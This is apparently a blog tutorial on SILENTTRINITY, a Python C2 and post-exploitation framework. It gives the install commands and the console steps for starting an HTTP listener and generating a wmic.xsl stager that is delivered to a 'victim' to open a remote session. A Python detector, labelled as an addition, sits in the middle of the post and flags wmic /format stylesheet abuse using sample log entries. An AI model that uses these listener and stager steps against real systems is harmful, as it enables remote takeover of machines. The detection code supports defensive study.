There are many tools, but those written in Python are the ones to fall in love with, especially SILENTTRINITY, which lets you do several things. You will learn about those in this publication, and best of all, you don't need any previous knowledge: you just have to use it and you'll learn.
The installation is very simple. Unlike on Windows, installing an application on Linux takes only a few console commands. The following commands install and start SILENTTRINITY:
    apt install python3.7 python3.7-dev python3-pip
    git clone https://github.com/byt3bl33d3r/SILENTTRINITY
    cd SILENTTRINITY/Server
    python3.7 -m pip install -r requirements.txt
    python3.7 st.py
The command-line syntax of this tool is very similar to that of Metasploit or Empire, and it is also very intuitive; for example, let's see what happens if we type the help command in the console.
We can easily configure an HTTP listener with the following commands:
    listeners
    use http
    set BindIP callback_ip_here
    set Port callback_port_here
    start
With our listener running, we will choose the wmic stager and generate it for the active listener “http”:
    stagers
    use wmic
    generate http
A wmic.xsl file containing the payload was generated in the Server directory, and we will deliver it via HTTP to the victim.
After the delivery and execution of the stager, we can see that a new session was opened on our server.
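A defender-side check for the stager execution described above, as an added example that is not part of the original post or of SILENTTRINITY: it flags process-creation records where wmic.exe is given a `/format:` stylesheet that is remote or not one of its built-in formats. The log records, the allowlist and the function names are constructed for illustration, and it assumes the XSL stylesheet is loaded through WMIC's `/format` switch.

```python
import re

# Constructed process-creation records (image path, command line); not from the page.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\wbem\\WMIC.exe",
     'wmic os get /format:"http://192.0.2.10/wmic.xsl"'),
    ("C:\\Windows\\System32\\wbem\\WMIC.exe",
     "wmic process list /FORMAT:C:\\Users\\Public\\wmic.xsl"),
    ("C:\\Windows\\System32\\wbem\\WMIC.exe", "wmic os get caption /format:list"),
    ("C:\\Windows\\System32\\wbem\\WMIC.exe", "wmic cpu get name /format:csv"),
    ("C:\\Windows\\System32\\cmd.exe", "cmd /c type wmic.xsl"),
]

# Assumed, partial allowlist of WMIC's built-in format keywords; tune per environment.
BUILTIN_FORMATS = {"csv", "hform", "htable", "list", "mof",
                   "rawxml", "table", "value", "xml"}

# Value of the /format switch, quoted or unquoted, matched case-insensitively.
FORMAT_RE = re.compile(r'/format\s*:\s*(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def classify(image, cmdline):
    """Return 'remote', 'custom' or None for one process-creation record."""
    if not image.lower().endswith("\\wmic.exe"):
        return None
    match = FORMAT_RE.search(cmdline)
    if not match:
        return None
    value = (match.group(1) or match.group(2)).strip().lower()
    # Stylesheet fetched over the network: URL or UNC path.
    if re.match(r"(https?|ftp)://", value) or value.startswith("\\\\"):
        return "remote"
    if value in BUILTIN_FORMATS:
        return None
    # Anything else is a stylesheet outside the assumed built-in set.
    return "custom"


def scan(events):
    """Return (verdict, command line) for every record worth an analyst's look."""
    hits = []
    for image, cmdline in events:
        verdict = classify(image, cmdline)
        if verdict:
            hits.append((verdict, cmdline))
    return hits


if __name__ == "__main__":
    for verdict, cmdline in scan(SAMPLE_EVENTS):
        print(f"[{verdict}] {cmdline}")
```

The check matches on the image name only, so a renamed copy of wmic.exe would need a rule keyed on the binary's original file name or hash instead.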
At this point we can play with several modules.
Summarising, SILENTTRINITY is a modern, asynchronous, multiplayer and multiserver C2 / post-exploitation framework driven by Python 3 and .NET's DLR.
Some of the main features that distinguish SILENTTRINITY are:
- Multi-user and multi-server: supports multi-user collaboration. In addition, the client can connect to and control multiple Teamservers.
- Client and Teamserver built in Python 3.7: the latest and best features of the Python language are used; heavy use of asyncio provides ridiculous speeds.
- Updates and communication in real-time: the use of WebSockets allows communication and updates in real-time between the Client and Teamserver.
- ECDHE encrypted C2 communication: SILENTTRINITY uses the ephemeral elliptic curve Diffie-Hellman key exchange to encrypt all C2 traffic between the Teamserver and its implant.
- Completely modular: listeners, modules, stagers and C2 channels are completely modular, allowing operators to easily build their own.
- Extensive logging: each action is recorded in a file.
I invite you to continue reviewing the publications on our website; I assure you that you will find many interesting topics that will expand your knowledge.